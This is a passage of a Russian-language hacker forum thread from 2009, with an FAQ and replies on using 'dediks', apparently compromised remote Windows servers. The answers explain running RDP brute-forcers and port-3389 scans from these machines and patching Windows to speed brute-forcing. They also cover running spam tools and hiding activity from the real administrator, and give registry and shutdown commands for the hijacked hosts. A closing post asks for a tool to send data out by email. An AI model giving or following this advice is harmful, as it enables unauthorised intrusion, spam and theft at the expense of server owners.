Можно задать минимальную длину создаваемого пароля, т.е наименьшее допустимое количество символов для нового пароля. Создайте двоичный параметр MinPwdLen в разделе HKEY_CURRENT_USER\SOFTWARE\Mic rosoft\Windows\CurrentVersion\ Policies\Network и присвойте ему некоторое значение, например 05. Теперь, если вы введете слово из трех символов при смене пароля, будет выводится окно с предупреждением, что пароль должен состоять из 5 символов. Диапазон значений, которые может принимать данный параметр: от "0" до "99".

Q: А надо ли патчить винду на деде? а то включаю брут,а скорость ппц маленькая! Разве на 2003 по умолчанию уже не установлено необходимое кол-во потоков для брута?
A: В W2K3 Enterprice Edition - не надо патчить. В Standart Edition и Home Edition - стоят ограничения, патчить обязательно, ну и перегрузиться потребуется. Патчить этим - http://half-open.com/Half-open_limit_fix_3.1.zip, подробно о программе тут

Q: Не могу делать скрины деда. Не могу копировать текст с компа на дед. Раньше мог. Что случилось?
A: tscc.msc > connections > %connection_name% > client settings > clipboard mapping - действует после перезапуска RDP службы.Бывает, что rdpclip.exe криво пашет. Помогает только перезагрузка процесса (убить в таск менеджере и Win-R -> rdpclip.exe)

Q: а как на деде сделать поддержку кириллицы? Чтобы неюинкодовые программы нормально работали (спамер и подобные, требующие русского языка)?
A: С основным языком - попробуй решить проблемы с помощью того, кто создал их - М$. На сайте нашёль программулько The Microsoft AppLocale Utility :download:.
Погуглив нашёл подтверждение моим [NemeZz] словам:
Цитата:
Для Русских программ - решения, их 2:
(1) 100% безопасное (не трогаем систему вообще), но гарантия, что сработает - не 100%. Но естественно стОит именно его сначала попробовать, а именно, по совету Микрософта, запускать Русские программы из-под спец. утилиты Applocale, вот информация на русском про это
(2) если Applocale не поможет, вот тогда - если Windows английская, а не немецкая/испанская - можно через Control Panel сменить системную кодовую страницу (System Code Page) на "Cyrillic, 1251" -
как раз это и происходит под XP в опции "выбора языка для не-Unicode программ".
Q: Не запускается диспетчер задач, даже через учетку администратор.
A: Выключить диспетчер задач - cmd.exe ->
REG add HKCU\Software\Microsoft\Window s\CurrentVersion\Policies\Syst em /v DisableTaskMgr /t REG_DWORD /d 1 /f
Включить диспетчер задач - cmd.exe ->
REG add HKCU\Software\Microsoft\Window s\CurrentVersion\Policies\Syst em /v DisableTaskMgr /t REG_DWORD /d 0 /f

Q: Что можно сделать если на деде в бруте не пашут прокся с портами xx0yy, на домашнем отлично работают
A: Это из за сервис паков. Ничего не сделаешь.

Q: Перезагрузка произойдёт только когда зайдёт админ на сервер?!
A: если есть telnet доступ к серваку, то этот процесс можно ускорить (!!! можно потерять деда)
Цитата:
shutdown.exe -r -f
Q: пишет типа система перегрелась и щас будет перезагружена..

Вот такая хрень у меня с дедиком твориццо постоянно.. как отключить эту прогу которая за температурой следит?
A: Ты так деда спалишь. Пиши админу, чтоб кулеры купил


6. Использование софта на дедиках:

Q: Поставил прогу **** на деде(месяц назад), вчера зашел на него, а папки с **** уже нет. Ну думаю залью заного, залил, поставил. Сейчас зашел, а там опять папка исчезла, что за бред и как исправить?
A: Убить админа ©

Q: Нужно восстановить любой ценой удалённые файлы с винды 2к3 на деде! файлы могут быть в корзине или удалены!
A: Любым восстановителем файлов. Главное поменьше на этот диск пиши и не запускай прог, чтобы своп не перезаписал поверх ничего. Проги для восстановления тут - выбирай любую.

Q: Захожу на другой дед (вин 2003) заливаю софтину, запускаю, ставлю скан на 3389 порт, захожу через часов 8 и там 0 результатов Кто знает в чём проблемка может быть...?? и уже не первый дед такой поподаеццО_о(
A: Попробуй в службах отключить ICS (Брандмауэр Windows/чего-то там...)

Q: Как скрыть значёк программки в трее?
A: для скрытия значка в трее(устанавливаем PS Tray Factory заменяем ехе и радуемся) Download | Скачать ~ 1.8Мб

Q: Почему при бруте на деде дедов через tss-brute открывается окно, но пароли не подбираются?
A: У вас на деде стоит новый рдп. Скачайте отсюда старый RDP, потом скопируй все лежащие в этом архиве файлы в папку на деде C:\Windows\system32 и поставьте на них права Read Only. :)


7. Неотвеченные:

:) Отсутствуют.

FAQ будет регулярно пополняться, спасибо всем, кому не влом было отвечать на вопросы новичков, без вашей помощи мне влом было бы всё самому писать.


P.S. Авторы ответов - NemeZz, XTT, [JavaScript], wintermoon, f4kedude, Andrew777, re$et, q1p, metal. Собрал вместе NemeZz. Кто с3,14здит на другой форум без копирайтов и ссылки на оригинальную тему будет подвергнут расстрелу, линчеванию и т.д. Всем удачного юзания дедов!
P.S. Пишем дополнения, новые вопросы - постараемся помочь всем! Всё новое будет внесено в FAQ

Последний раз редактировалось NemeZz; 10.01.2009 в 01:48.
NemeZz вне форума  
Плюсанул NemeZz :
Старый 09.01.2009, 13:18   #18
Участник
 
Аватар для metal
 
Регистрация: 31.10.2003
Сообщений: 568

Репутация: 1627
По умолчанию

Цитата:
Сообщение от NemeZz Посмотреть сообщение
Q: А вот такое где править? (в secpol.msc не нашел что-то...)
http://s58.radikal.ru/i162/0901/bb/af7d0065cee4t.jpg
A: ---
Локальному юзеру запрещен локальный вход в систему.
В 2003 лечится так

secpol.msc - Local Policies - User Rights Assignment - Allow log on locally и Allow log on through Terminal Services

юзер должен присутствовать в списке

в пункте Deny log on locally, Deny access to this computer from the network - соответственно отсутстсвовать
__________________
Красивые номерки - niceuin.ru
info
icq [553-555]
metal вне форума  
Старый 10.01.2009, 01:49   #19
Участник
 
Регистрация: 05.08.2008
Сообщений: 218

Репутация: 400
По умолчанию

* Обновил, расширил и дополнил ПОЛЕЗНЫМИ советами и прогами от XTT и своими собственными :o.
+ Добавлены полезные проги в раздел скрытности+всё для патчинга и настройки WinXP+Win2k3.
+ Добавлен альтернативный метод добавления юзера через vbs скрипт.
+ Добавлено уточнение по добавлению юзера через lusrmgr.msc и dsa.msc.
+ Добавлено решение вопроса по локальным политикам безопасности. Danke 2 metal
NemeZz вне форума  
Старый 10.01.2009, 02:13   #20
Участник
 
Аватар для mff
 
Регистрация: 29.05.2008
Сообщений: 465

ICQ: 400000010

Репутация: 2409
Отправить сообщение для mff с помощью Skype™
По умолчанию

NemeZz, молочина, прикрасный faq! Вот бы еще поподробнее про telnet написал.
__________________
онлайн тв
mff вне форума  
Старый 10.01.2009, 17:00   #21
Участник
 
Регистрация: 06.12.2008
Сообщений: 38

ICQ: 264462

Репутация: 142
По умолчанию

Цитата:
Сообщение от mff44 Посмотреть сообщение
NemeZz, молочина, прикрасный faq! Вот бы еще поподробнее про telnet написал.
Ну а что тут сложного? на удаленном компе пуск>выполнить>services.msc>ищ ем telnet>свойства>тип запуска авто
только палевно это очень...

И еще я в фак добавил-бы что совершенно не обязательно подключать весь винт, я подключаю только флешку с необходимым софтом, флешка в моем компе не так палевно смотрится если даже админ увидит, пока одумается ее уже отключишь
ilya1 вне форума  
Старый 10.01.2009, 17:06   #22
Участник
 
Аватар для mff
 
Регистрация: 29.05.2008
Сообщений: 465

ICQ: 400000010

Репутация: 2409
Отправить сообщение для mff с помощью Skype™
По умолчанию

Цитата:
Сообщение от ilya1 Посмотреть сообщение
Ну а что тут сложного? на удаленном компе пуск>выполнить>services.msc>ищ ем telnet>свойства>тип запуска авто
только палевно это очень...
как включить ту или иную службу - ни кто не спрашивал, под словами поподробнее про telnet имелось в виду - как с ним работать, какое ПО и т.д....
__________________
онлайн тв
mff вне форума  
Старый 10.01.2009, 21:37   #23
Участник
 
Аватар для Limanskiy
 
Регистрация: 08.11.2006
Сообщений: 717

Репутация: 3168
По умолчанию

mff44, Взлом через TELNET

Думаю, в тему ещё можно добавить такую настройку.

Закладка "Пользователи" (Users) отображается в Диспечере задач
Код:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"AllowMultipleTSSessions"=dword:00000001
Закладка "Пользователи" (Users) не отображается в Диспечере задач
Код:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"AllowMultipleTSSessions"=dword:00000000
Это для XP-дэдов, где сидят вислоухие юзеры, чтоб случайно, как у них часто бывает, не логоффнули вас.

+ Очень много интересных настроек реестра Запрет и разрешение функций ОС

Последний раз редактировалось Limanskiy; 10.01.2009 в 21:40.
Limanskiy вне форума  
Старый 10.01.2009, 21:48   #24
Участник
 
Аватар для mff
 
Регистрация: 29.05.2008
Сообщений: 465

ICQ: 400000010

Репутация: 2409
Отправить сообщение для mff с помощью Skype™
По умолчанию

Limanskill, спс, замечательная статья!
__________________
онлайн тв
mff вне форума  
Старый 11.01.2009, 18:52   #25
Участник
 
Регистрация: 11.04.2008
Сообщений: 26

ICQ: 2438587

Репутация: 1
По умолчанию

Да это дейсствительна БИГ фак :)
Кстати есть ли программа которая бы периодически информацию из source отправляла на Е-маил, сайт или куда нибуть ещё?
Escape вне форума  
 

Метки
dedicated server, faq.

Опции темы
Оценка этой теме
Оценка этой теме:

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход


Часовой пояс GMT +3, время: 17:44.


Перевод: zCarot
Форум Асечников © Asechka.RU

Новости Сочи